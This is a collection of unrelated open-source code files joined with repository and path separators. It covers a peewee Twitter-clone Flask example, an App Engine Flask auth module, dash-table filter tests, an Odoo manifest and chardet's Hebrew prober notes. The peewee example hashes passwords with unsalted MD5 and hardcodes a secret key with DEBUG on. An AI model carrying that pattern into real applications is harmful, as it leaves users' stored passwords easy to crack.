other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
coleifer/peewee
|
refs/heads/master
|
examples/twitter/app.py
|
1
|
import datetime
from flask import Flask
from flask import g
from flask import redirect
from flask import request
from flask import session
from flask import url_for, abort, render_template, flash
from functools import wraps
from hashlib import md5
from peewee import *
# config - aside from our database, the rest is for use by Flask
DATABASE = 'tweepee.db'
DEBUG = True
SECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'
# create a flask application - this ``app`` object will be used to handle
# inbound requests, routing them to the proper 'view' functions, etc
app = Flask(__name__)
app.config.from_object(__name__)
# create a peewee database instance -- our models will use this database to
# persist information
database = SqliteDatabase(DATABASE)
# model definitions -- the standard "pattern" is to define a base model class
# that specifies which database to use. then, any subclasses will automatically
# use the correct storage. for more information, see:
# https://charlesleifer.com/docs/peewee/peewee/models.html#model-api-smells-like-django
class BaseModel(Model):
class Meta:
database = database
# the user model specifies its fields (or columns) declaratively, like django
class User(BaseModel):
username = CharField(unique=True)
password = CharField()
email = CharField()
join_date = DateTimeField()
# it often makes sense to put convenience methods on model instances, for
# example, "give me all the users this user is following":
def following(self):
# query other users through the "relationship" table
return (User
.select()
.join(Relationship, on=Relationship.to_user)
.where(Relationship.from_user == self)
.order_by(User.username))
def followers(self):
return (User
.select()
.join(Relationship, on=Relationship.from_user)
.where(Relationship.to_user == self)
.order_by(User.username))
def is_following(self, user):
return (Relationship
.select()
.where(
(Relationship.from_user == self) &
(Relationship.to_user == user))
.exists())
def gravatar_url(self, size=80):
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)
# this model contains two foreign keys to user -- it essentially allows us to
# model a "many-to-many" relationship between users. by querying and joining
# on different columns we can expose who a user is "related to" and who is
# "related to" a given user
class Relationship(BaseModel):
from_user = ForeignKeyField(User, backref='relationships')
to_user = ForeignKeyField(User, backref='related_to')
class Meta:
indexes = (
# Specify a unique multi-column index on from/to-user.
(('from_user', 'to_user'), True),
)
# a dead simple one-to-many relationship: one user has 0..n messages, exposed by
# the foreign key. because we specified a backref of "messages", a user's
# messages are accessible as a special attribute, User.messages
class Message(BaseModel):
user = ForeignKeyField(User, backref='messages')
content = TextField()
pub_date = DateTimeField()
# simple utility function to create tables
def create_tables():
with database:
database.create_tables([User, Relationship, Message])
# flask provides a "session" object, which allows us to store information across
# requests (stored by default in a secure cookie). this function allows us to
# mark a user as being logged-in by setting some values in the session data:
def auth_user(user):
session['logged_in'] = True
session['user_id'] = user.id
session['username'] = user.username
flash('You are logged in as %s' % (user.username))
# get the user from the session
def get_current_user():
if session.get('logged_in'):
return User.get(User.id == session['user_id'])
# view decorator which indicates that the requesting user must be authenticated
# before they can access the view. it checks the session to see if they're
# logged in, and if not redirects them to the login view.
def login_required(f):
@wraps(f)
def inner(*args, **kwargs):
if not session.get('logged_in'):
return redirect(url_for('login'))
return f(*args, **kwargs)
return inner
# given a template and a SelectQuery instance, render a paginated list of
# objects from the query inside the template
def object_list(template_name, qr, var_name='object_list', **kwargs):
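    # peewee's paginate() defaults to 20 rows per page, matching the page
    # count computed here.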
kwargs.update(
page=int(request.args.get('page', 1)),
        pages=qr.count() // 20 + 1)
kwargs[var_name] = qr.paginate(kwargs['page'])
return render_template(template_name, **kwargs)
# retrieve a single object matching the specified query or 404 -- this uses the
# shortcut "get" method on model, which retrieves a single object or raises a
# DoesNotExist exception if no matching object exists
# https://charlesleifer.com/docs/peewee/peewee/models.html#Model.get)
def get_object_or_404(model, *expressions):
try:
return model.get(*expressions)
except model.DoesNotExist:
abort(404)
# custom template filter -- flask allows you to define these functions and then
# they are accessible in the template -- this one returns a boolean whether the
# given user is following another user.
@app.template_filter('is_following')
def is_following(from_user, to_user):
return from_user.is_following(to_user)
# Request handlers -- these two hooks are provided by flask and we will use them
# to create and tear down a database connection on each request.
@app.before_request
def before_request():
g.db = database
g.db.connect()
@app.after_request
def after_request(response):
g.db.close()
return response
# views -- these are the actual mappings of url to view function
@app.route('/')
def homepage():
# depending on whether the requesting user is logged in or not, show them
# either the public timeline or their own private timeline
if session.get('logged_in'):
return private_timeline()
else:
return public_timeline()
@app.route('/private/')
def private_timeline():
# the private timeline exemplifies the use of a subquery -- we are asking for
# messages where the person who created the message is someone the current
# user is following. these messages are then ordered newest-first.
user = get_current_user()
messages = (Message
.select()
.where(Message.user << user.following())
.order_by(Message.pub_date.desc()))
return object_list('private_messages.html', messages, 'message_list')
@app.route('/public/')
def public_timeline():
# simply display all messages, newest first
messages = Message.select().order_by(Message.pub_date.desc())
return object_list('public_messages.html', messages, 'message_list')
@app.route('/join/', methods=['GET', 'POST'])
def join():
if request.method == 'POST' and request.form['username']:
try:
with database.atomic():
# Attempt to create the user. If the username is taken, due to the
# unique constraint, the database will raise an IntegrityError.
user = User.create(
username=request.form['username'],
password=md5((request.form['password']).encode('utf-8')).hexdigest(),
email=request.form['email'],
join_date=datetime.datetime.now())
# mark the user as being 'authenticated' by setting the session vars
auth_user(user)
return redirect(url_for('homepage'))
except IntegrityError:
flash('That username is already taken')
return render_template('join.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
pw_hash = md5(request.form['password'].encode('utf-8')).hexdigest()
user = User.get(
(User.username == request.form['username']) &
(User.password == pw_hash))
except User.DoesNotExist:
flash('The password entered is incorrect')
else:
auth_user(user)
return redirect(url_for('homepage'))
return render_template('login.html')
@app.route('/logout/')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('homepage'))
@app.route('/following/')
@login_required
def following():
user = get_current_user()
return object_list('user_following.html', user.following(), 'user_list')
@app.route('/followers/')
@login_required
def followers():
user = get_current_user()
return object_list('user_followers.html', user.followers(), 'user_list')
@app.route('/users/')
def user_list():
users = User.select().order_by(User.username)
return object_list('user_list.html', users, 'user_list')
@app.route('/users/<username>/')
def user_detail(username):
# using the "get_object_or_404" shortcut here to get a user with a valid
# username or short-circuit and display a 404 if no user exists in the db
user = get_object_or_404(User, User.username == username)
    # get all the user's messages ordered newest-first -- note how we're accessing
    # the messages via the backref -- user.messages. could also have written it as:
    # Message.select().where(Message.user == user)
messages = user.messages.order_by(Message.pub_date.desc())
return object_list('user_detail.html', messages, 'message_list', user=user)
@app.route('/users/<username>/follow/', methods=['POST'])
@login_required
def user_follow(username):
user = get_object_or_404(User, User.username == username)
try:
with database.atomic():
Relationship.create(
from_user=get_current_user(),
to_user=user)
except IntegrityError:
pass
flash('You are following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/users/<username>/unfollow/', methods=['POST'])
@login_required
def user_unfollow(username):
user = get_object_or_404(User, User.username == username)
(Relationship
.delete()
.where(
(Relationship.from_user == get_current_user()) &
(Relationship.to_user == user))
.execute())
flash('You are no longer following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/create/', methods=['GET', 'POST'])
@login_required
def create():
user = get_current_user()
if request.method == 'POST' and request.form['content']:
message = Message.create(
user=user,
content=request.form['content'],
pub_date=datetime.datetime.now())
flash('Your message has been created')
return redirect(url_for('user_detail', username=user.username))
return render_template('create.html')
@app.context_processor
def _inject_user():
return {'current_user': get_current_user()}
# allow running from the command line
if __name__ == '__main__':
create_tables()
app.run()
|
gmist/fix-5studio
|
refs/heads/master
|
main/auth/auth.py
|
4
|
# coding: utf-8
from __future__ import absolute_import
import functools
import re
from flask_oauthlib import client as oauth
from google.appengine.ext import ndb
import flask
import flask_login
import flask_wtf
import unidecode
import wtforms
import cache
import config
import model
import task
import util
from main import app
_signals = flask.signals.Namespace()
###############################################################################
# Flask Login
###############################################################################
login_manager = flask_login.LoginManager()
class AnonymousUser(flask_login.AnonymousUserMixin):
id = 0
admin = False
name = 'Anonymous'
user_db = None
def key(self):
return None
def has_permission(self, permission):
return False
login_manager.anonymous_user = AnonymousUser
class FlaskUser(AnonymousUser):
def __init__(self, user_db):
self.user_db = user_db
self.id = user_db.key.id()
self.name = user_db.name
self.admin = user_db.admin
def key(self):
return self.user_db.key.urlsafe()
def get_id(self):
return self.user_db.key.urlsafe()
def is_authenticated(self):
return True
def is_active(self):
return self.user_db.active
def is_anonymous(self):
return False
def has_permission(self, permission):
return self.user_db.has_permission(permission)
@login_manager.user_loader
def load_user(key):
user_db = ndb.Key(urlsafe=key).get()
if user_db:
return FlaskUser(user_db)
return None
login_manager.init_app(app)
def current_user_id():
return flask_login.current_user.id
def current_user_key():
return flask_login.current_user.user_db.key \
if flask_login.current_user.user_db else None
def current_user_db():
return flask_login.current_user.user_db
def is_logged_in():
return flask_login.current_user.id != 0
###############################################################################
# Decorators
###############################################################################
def login_required(f):
decorator_order_guard(f, 'auth.login_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if is_logged_in():
return f(*args, **kwargs)
if flask.request.path.startswith('/api/'):
return flask.abort(401)
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return decorated_function
def admin_required(f):
decorator_order_guard(f, 'auth.admin_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if is_logged_in() and current_user_db().admin:
return f(*args, **kwargs)
if not is_logged_in() and flask.request.path.startswith('/api/'):
return flask.abort(401)
if not is_logged_in():
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
def cron_required(f):
decorator_order_guard(f, 'auth.cron_required')
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if 'X-Appengine-Cron' in flask.request.headers:
return f(*args, **kwargs)
if is_logged_in() and current_user_db().admin:
return f(*args, **kwargs)
if not is_logged_in():
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
permission_registered = _signals.signal('permission-registered')
def permission_required(permission=None, methods=None):
def permission_decorator(f):
decorator_order_guard(f, 'auth.permission_required')
# default to decorated function name as permission
perm = permission or f.func_name
meths = [m.upper() for m in methods] if methods else None
permission_registered.send(f, permission=perm)
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if meths and flask.request.method.upper() not in meths:
return f(*args, **kwargs)
if is_logged_in() and current_user_db().has_permission(perm):
return f(*args, **kwargs)
if not is_logged_in():
if flask.request.path.startswith('/api/'):
return flask.abort(401)
return flask.redirect(flask.url_for('signin', next=flask.request.url))
return flask.abort(403)
return decorated_function
return permission_decorator
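# Illustrative usage sketch (hypothetical view function, not part of this
# module): the auth decorators must sit *below* the route decorator so that
# decorator_order_guard (defined later in this file) can detect misuse.
#
#   @app.route('/report/', methods=['GET', 'POST'])
#   @permission_required(permission='view_report', methods=['POST'])
#   def report():
#     return flask.render_template('report.html')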
###############################################################################
# Sign in stuff
###############################################################################
class SignInForm(flask_wtf.FlaskForm):
email = wtforms.StringField(
'Email',
[wtforms.validators.required()],
filters=[util.email_filter],
)
password = wtforms.StringField(
'Password',
[wtforms.validators.required()],
)
remember = wtforms.BooleanField(
'Keep me signed in',
[wtforms.validators.optional()],
)
recaptcha = flask_wtf.RecaptchaField()
next_url = wtforms.HiddenField()
@app.route('/signin/', methods=['GET', 'POST'])
def signin():
next_url = util.get_next_url()
form = None
if config.CONFIG_DB.has_email_authentication:
form = form_with_recaptcha(SignInForm())
save_request_params()
if form.validate_on_submit():
result = get_user_db_from_email(form.email.data, form.password.data)
if result:
cache.reset_auth_attempt()
return signin_user_db(result)
if result is None:
form.email.errors.append('Email or Password do not match')
if result is False:
return flask.redirect(flask.url_for('welcome'))
if not form.errors:
form.next_url.data = next_url
if form and form.errors:
cache.bump_auth_attempt()
return flask.render_template(
'auth/auth.html',
title='Sign in',
html_class='auth',
next_url=next_url,
form=form,
form_type='signin' if config.CONFIG_DB.has_email_authentication else '',
**urls_for_oauth(next_url)
)
###############################################################################
# Sign up stuff
###############################################################################
class SignUpForm(flask_wtf.FlaskForm):
email = wtforms.StringField(
'Email',
[wtforms.validators.required(), wtforms.validators.email()],
filters=[util.email_filter],
)
recaptcha = flask_wtf.RecaptchaField()
@app.route('/signup/', methods=['GET', 'POST'])
def signup():
next_url = util.get_next_url()
form = None
if config.CONFIG_DB.has_email_authentication:
form = form_with_recaptcha(SignUpForm())
save_request_params()
if form.validate_on_submit():
user_db = model.User.get_by('email', form.email.data)
if user_db:
form.email.errors.append('This email is already taken.')
if not form.errors:
user_db = create_user_db(
None,
util.create_name_from_email(form.email.data),
form.email.data,
form.email.data,
)
user_db.put()
task.activate_user_notification(user_db)
cache.bump_auth_attempt()
return flask.redirect(flask.url_for('welcome'))
if form and form.errors:
cache.bump_auth_attempt()
title = 'Sign up' if config.CONFIG_DB.has_email_authentication else 'Sign in'
return flask.render_template(
'auth/auth.html',
title=title,
html_class='auth',
next_url=next_url,
form=form,
**urls_for_oauth(next_url)
)
###############################################################################
# Sign out stuff
###############################################################################
@app.route('/signout/')
def signout():
flask_login.logout_user()
return flask.redirect(util.param('next') or flask.url_for('signin'))
###############################################################################
# Helpers
###############################################################################
def url_for_signin(service_name, next_url):
return flask.url_for('signin_%s' % service_name, next=next_url)
def urls_for_oauth(next_url):
return {
'azure_ad_signin_url': url_for_signin('azure_ad', next_url),
'bitbucket_signin_url': url_for_signin('bitbucket', next_url),
'dropbox_signin_url': url_for_signin('dropbox', next_url),
'facebook_signin_url': url_for_signin('facebook', next_url),
'github_signin_url': url_for_signin('github', next_url),
'google_signin_url': url_for_signin('google', next_url),
'gae_signin_url': url_for_signin('gae', next_url),
'instagram_signin_url': url_for_signin('instagram', next_url),
'linkedin_signin_url': url_for_signin('linkedin', next_url),
'mailru_signin_url': url_for_signin('mailru', next_url),
'microsoft_signin_url': url_for_signin('microsoft', next_url),
'reddit_signin_url': url_for_signin('reddit', next_url),
'twitter_signin_url': url_for_signin('twitter', next_url),
'vk_signin_url': url_for_signin('vk', next_url),
'yahoo_signin_url': url_for_signin('yahoo', next_url),
}
def create_oauth_app(service_config, name):
upper_name = name.upper()
app.config[upper_name] = service_config
service_oauth = oauth.OAuth()
service_app = service_oauth.remote_app(name, app_key=upper_name)
service_oauth.init_app(app)
return service_app
def decorator_order_guard(f, decorator_name):
if f in app.view_functions.values():
raise SyntaxError(
'Do not use %s above app.route decorators as it would not be checked. '
'Instead move the line below the app.route lines.' % decorator_name
)
def save_request_params():
flask.session['auth-params'] = {
'next': util.get_next_url(),
'remember': util.param('remember'),
}
def signin_oauth(oauth_app, scheme=None):
try:
flask.session.pop('oauth_token', None)
save_request_params()
return oauth_app.authorize(callback=flask.url_for(
'%s_authorized' % oauth_app.name, _external=True, _scheme=scheme
))
except oauth.OAuthException:
flask.flash(
'Something went wrong with sign in. Please try again.',
category='danger',
)
return flask.redirect(flask.url_for('signin', next=util.get_next_url()))
def form_with_recaptcha(form):
should_have_recaptcha = cache.get_auth_attempt() >= config.RECAPTCHA_LIMIT
if not (should_have_recaptcha and config.CONFIG_DB.has_recaptcha):
del form.recaptcha
return form
###############################################################################
# User related stuff
###############################################################################
def create_user_db(auth_id, name, username, email='', verified=False, **props):
email = email.lower() if email else ''
if verified and email:
user_dbs, cursors = model.User.get_dbs(email=email, verified=True, limit=2)
if len(user_dbs) == 1:
user_db = user_dbs[0]
user_db.auth_ids.append(auth_id)
user_db.put()
task.new_user_notification(user_db)
return user_db
if isinstance(username, str):
username = username.decode('utf-8')
username = unidecode.unidecode(username.split('@')[0].lower()).strip()
username = re.sub(r'[\W_]+', '.', username)
new_username = username
n = 1
while not model.User.is_username_available(new_username):
new_username = '%s%d' % (username, n)
n += 1
user_db = model.User(
name=name,
email=email,
username=new_username,
auth_ids=[auth_id] if auth_id else [],
verified=verified,
token=util.uuid(),
**props
)
user_db.put()
task.new_user_notification(user_db)
return user_db
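# Username derivation example (a walkthrough of the logic above; the input
# value is illustrative): 'John_Doe@Example.com' -> split on '@', lowercase
# and unidecode -> 'john_doe' -> re.sub(r'[\W_]+', '.') -> 'john.doe'; if
# taken, try 'john.doe1', 'john.doe2', ... until is_username_available().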
@ndb.toplevel
def signin_user_db(user_db):
if not user_db:
return flask.redirect(flask.url_for('signin'))
flask_user_db = FlaskUser(user_db)
auth_params = flask.session.get('auth-params', {
'next': flask.url_for('welcome'),
'remember': False,
})
flask.session.pop('auth-params', None)
if flask_login.login_user(flask_user_db, remember=auth_params['remember']):
user_db.put_async()
return flask.redirect(util.get_next_url(auth_params['next']))
flask.flash('Sorry, but you could not sign in.', category='danger')
return flask.redirect(flask.url_for('signin'))
def get_user_db_from_email(email, password):
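  # Tri-state result: a user_db on success, None when the email/password
  # pair does not match, and False when duplicate active accounts share the
  # email (the caller in signin() branches on all three values).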
user_dbs, cursors = model.User.get_dbs(email=email, active=True, limit=2)
if not user_dbs:
return None
if len(user_dbs) > 1:
flask.flash('''We are sorry but it looks like there is a conflict with
your account. Our support team has been informed and we will get
back to you as soon as possible.''', category='danger')
task.email_conflict_notification(email)
return False
user_db = user_dbs[0]
if user_db.password_hash == util.password_hash(user_db, password):
return user_db
return None
|
odoocn/odoomrp-wip
|
refs/heads/8.0
|
sale_order_recalculate_prices_variants/__openerp__.py
|
17
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
{
"name": "Sale Order Recalculate Prices - Variants extension",
"version": "1.0",
"depends": [
"sale_order_recalculate_prices",
"sale_product_variants",
],
"author": "OdooMRP team,"
"AvanzOSC,"
"Serv. Tecnol. Avanzados - Pedro M. Baeza",
"website": "http://www.odoomrp.com",
"contributors": [
"Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
"Pedro M. Baeza <pedro.baeza@serviciosbaeza.com>",
"Ana Juaristi <ajuaristio@gmail.com>"
],
"category": "Hidden/Dependency",
"summary": "",
"installable": True,
"auto_install": True,
}
|
plotly/dash-table
|
refs/heads/dev
|
tests/selenium/test_filter.py
|
1
|
import dash
from dash_table import DataTable
import pytest
DATA_SIZE = 50
def get_table_defaults():
return dict(
id="table",
data=[
dict(a=1, b=11, c=111),
dict(a=2, b=12, c=113),
dict(a=3, b=14, c=116),
dict(a=4, b=17, c=120),
dict(a=5, b=21, c=125),
],
columns=[
dict(id="a", name="a"),
dict(id="b", name="b"),
dict(id="c", name="c"),
],
)
def get_native_table():
props = get_table_defaults()
props["filter_action"] = "native"
return props
def get_native_and_table():
props = get_table_defaults()
props["filter_action"] = dict(type="native", operator="and")
return props
def get_native_or_table():
props = get_table_defaults()
props["filter_action"] = dict(type="native", operator="or")
return props
def get_app(props):
app = dash.Dash(__name__)
app.layout = DataTable(**props)
return app
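# Minimal manual-run sketch (an assumption for debugging outside the pytest
# harness; not part of the test suite) to inspect one of these tables:
#
#   if __name__ == "__main__":
#       get_app(get_native_table()).run_server(debug=True)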
@pytest.mark.parametrize(
"props,expect",
[
(get_native_table(), ["4"]),
(get_native_and_table(), ["4"]),
(get_native_or_table(), ["1", "3", "4", "5"]),
],
)
def test_filt001_basic(test, props, expect):
test.start_server(get_app(props))
target = test.table("table")
target.column("a").filter_value("gt 3")
target.column("b").filter_value("is prime")
target.column("c").filter_value("ne 113")
target.column("a").filter_click()
for index, value in enumerate(expect):
assert target.cell(index, "a").get_text() == value
assert test.get_log_errors() == []
@pytest.mark.parametrize(
"filter_options,column_filter_options",
[
("sensitive", None),
("sensitive", None),
("sensitive", None),
("insensitive", None),
("sensitive", "insensitive"),
("insensitive", "sensitive"),
],
)
def test_filt002_sensitivity(test, filter_options, column_filter_options):
props = dict(
id="table",
data=[dict(a="abc", b="abc", c="abc"), dict(a="ABC", b="ABC", c="ABC")],
columns=[
dict(
id="a",
name="a",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="any",
),
dict(
id="b",
name="b",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="text",
),
dict(
id="c",
name="c",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="numeric",
),
],
filter_action="native",
filter_options=dict(case=filter_options)
if filter_options is not None
else None,
style_cell=dict(width=100, min_width=100, max_width=100),
)
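    # Note: a column-level filter_options setting overrides the table-level
    # one; the effective case sensitivity asserted below follows that
    # precedence.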
sensitivity = (
filter_options if column_filter_options is None else column_filter_options
)
test.start_server(get_app(props))
target = test.table("table")
# any -> implicit contains
target.column("a").filter_value("A")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "ABC"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("a")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "abc"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
# text -> implicit contains
target.column("a").filter_value("")
target.column("b").filter_value("A")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "ABC"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("a")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "abc"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
# numeric -> implicit equal
target.column("b").filter_value("")
target.column("c").filter_value("A")
assert not target.cell(0, "c").exists()
target.column("c").filter_value("a")
assert not target.cell(0, "c").exists()
target.column("c").filter_value("ABC")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "ABC"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
target.column("c").filter_value("abc")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "abc"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
@pytest.mark.parametrize(
"filter_options,column_filter_options",
[
("sensitive", None),
("sensitive", None),
("sensitive", None),
("insensitive", None),
("sensitive", "insensitive"),
("insensitive", "sensitive"),
],
)
def test_filt003_sensitivity(test, filter_options, column_filter_options):
props = dict(
id="table",
data=[dict(a="abc", b="abc", c="abc"), dict(a="ABC", b="ABC", c="ABC")],
columns=[
dict(
id="a",
name="a",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="any",
),
dict(
id="b",
name="b",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="text",
),
dict(
id="c",
name="c",
filter_options=dict(case=column_filter_options)
if column_filter_options is not None
else None,
type="numeric",
),
],
filter_action="native",
filter_options=dict(case=filter_options)
if filter_options is not None
else None,
style_cell=dict(width=100, min_width=100, max_width=100),
)
sensitivity = (
filter_options if column_filter_options is None else column_filter_options
)
test.start_server(get_app(props))
target = test.table("table")
target.column("a").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "ABC"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "a").get_text() == "abc"
assert not target.cell(1, "a").exists()
else:
assert target.cell(0, "a").get_text() == "abc"
assert target.cell(1, "a").get_text() == "ABC"
target.column("a").filter_value("")
target.column("b").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "ABC"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "b").get_text() == "abc"
assert not target.cell(1, "b").exists()
else:
assert target.cell(0, "b").get_text() == "abc"
assert target.cell(1, "b").get_text() == "ABC"
target.column("b").filter_value("")
target.column("c").filter_value("contains A")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "ABC"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
target.column("c").filter_value("contains a")
if sensitivity == "sensitive":
assert target.cell(0, "c").get_text() == "abc"
assert not target.cell(1, "c").exists()
else:
assert target.cell(0, "c").get_text() == "abc"
assert target.cell(1, "c").get_text() == "ABC"
|
krismcfarlin/todo_angular_endpoints
|
refs/heads/master
|
bp_includes/external/requests/packages/chardet/hebrewprober.py
|
2928
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Shy Shalom
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
### General ideas of the Hebrew charset recognition ###
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
# To sum up all of the above, the Hebrew probing mechanism knows about two
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contains special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
#
# The prober is divided between two SBCharSetProbers and a HebrewProber,
# all of which are managed, created, fed data, inquired and deleted by the
# SBCSGroupProber. The two SBCharSetProbers identify that the text is in
# fact some kind of Hebrew, Logical or Visual. The final decision about which
# one it is is made by the HebrewProber by combining final-letter scores
# with the scores of the two SBCharSetProbers to produce a final answer.
#
# The SBCSGroupProber is responsible for stripping the original text of HTML
# tags, English characters, numbers, low-ASCII punctuation characters, spaces
# and new lines. It reduces any sequence of such characters to a single space.
# The buffer fed to each prober in the SBCS group prober is pure text in
# high-ASCII.
# The two SBCharSetProbers (model probers) share the same language model:
# Win1255Model.
# The first SBCharSetProber uses the model normally as any other
# SBCharSetProber does, to recognize windows-1255, upon which this model was
# built. The second SBCharSetProber is told to make the pair-of-letter
# lookup in the language model backwards. This in practice exactly simulates
# a visual Hebrew model using the windows-1255 logical Hebrew model.
#
# The HebrewProber is not using any language model. All it does is look for
# final-letter evidence suggesting the text is either logical Hebrew or visual
# Hebrew. Disjointed from the model probers, the results of the HebrewProber
# alone are meaningless. HebrewProber always returns 0.00 as confidence
# since it never identifies a charset by itself. Instead, the pointer to the
# HebrewProber is passed to the model probers as a helper "Name Prober".
